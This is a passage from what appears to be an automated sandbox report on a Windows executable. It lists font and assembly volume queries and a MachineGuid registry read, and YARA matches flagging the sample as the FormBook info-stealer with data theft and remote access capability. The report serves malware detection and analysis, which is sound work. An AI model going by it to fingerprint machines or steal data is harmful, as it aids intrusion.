Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE